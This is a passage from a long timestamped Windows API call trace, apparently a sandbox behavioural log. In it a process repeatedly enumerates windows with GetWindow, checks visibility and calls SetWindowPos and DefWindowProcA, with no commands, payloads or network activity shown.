(hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.555] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.555] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.555] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.555] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.555] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.555] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.555] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.555] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.555] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.555] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.555] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.555] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.555] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.555] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.555] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.555] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.555] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.555] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.555] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.555] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.555] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.556] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.556] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.556] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.556] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.556] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.556] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.556] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.556] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.556] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.556] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.556] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.556] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.556] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.556] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.556] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.556] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.556] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.556] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.556] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.556] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.556] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.556] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.556] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.556] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.556] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.556] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.556] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.556] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.556] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.556] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.556] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.557] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.557] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.557] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.557] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.557] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.557] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.557] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.557] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.557] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.557] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.557] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.557] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.557] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.557] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.557] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.557] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.557] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.557] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.557] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.557] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.557] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.557] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.557] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.557] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.558] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.558] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.558] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.558] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.558] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.558] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.558] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.558] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.558] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.558] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.558] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.558] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.558] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.558] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.558] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.558] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.558] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.558] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.558] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.558] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.558] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.558] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.558] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.558] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.558] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.559] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.559] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.559] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.559] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.559] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.559] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.559] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.559] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.559] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.559] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.559] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.559] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.559] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.559] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.559] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.559] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.559] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.559] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.559] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.559] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.559] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.559] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.559] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.559] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.559] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.560] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.560] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.560] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.560] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.560] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.560] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.560] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.560] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.560] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.560] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.560] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.560] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.560] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.560] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.560] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.560] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.560] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.560] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.560] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.560] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.560] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.560] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.560] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.560] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.561] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.561] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.561] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.561] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.561] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.561] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.561] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.561] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.561] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.561] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.561] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.561] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.561] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.561] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.561] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.561] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.561] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.561] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.561] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.561] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.561] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.561] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.561] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.561] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.561] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.561] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.561] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.561] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.561] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.561] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.562] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.562] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.562] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.562] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.562] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.562] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.562] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.562] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.562] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.562] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.562] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.562] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.562] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.562] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.562] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.562] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.562] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.562] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.562] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.562] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.562] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.562] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.562] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.562] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.562] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.562] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.562] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.562] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.562] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.562] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.562] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.562] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.563] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.563] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.563] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.563] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.563] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.563] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.563] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.563] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.563] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.563] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.563] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.563] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.563] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.563] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.563] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.563] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.563] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.563] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.563] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.563] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.563] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.563] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.563] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.563] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.563] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.563] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.563] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.563] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.563] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.563] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.563] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.564] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.564] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.564] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.564] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.564] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.564] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.564] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.564] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.564] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.564] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.564] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.564] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.564] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.564] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.564] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.564] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.564] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.564] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.564] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.564] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.564] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.564] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.564] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.564] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.564] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.564] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.564] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.564] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.564] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.564] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.564] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.564] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.565] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.565] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.565] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.565] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.565] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.565] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.565] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.565] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.565] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.565] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.565] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.565] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.565] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.565] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.565] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.565] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.565] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.565] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.565] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.565] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.565] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.565] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.565] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.565] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.565] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.565] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.565] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.565] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.565] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.566] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.566] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.566] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.566] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.566] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.566] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.566] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.566] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.566] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.566] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.566] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.566] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.566] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.566] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.566] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.566] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.566] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.566] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.566] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.566] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.566] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.566] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.566] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.566] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.566] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.567] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.567] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.567] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.567] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.567] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.567] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.567] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.567] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.567] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.567] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.567] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.567] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.567] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.567] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.567] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.567] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.567] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.567] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.567] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.567] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.567] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.567] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.567] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.567] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.568] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.568] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.568] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.568] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.568] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.568] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.568] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.568] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.568] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.568] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.568] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.568] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.568] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.568] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.568] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.568] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.568] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.568] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.568] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.568] GetWindow 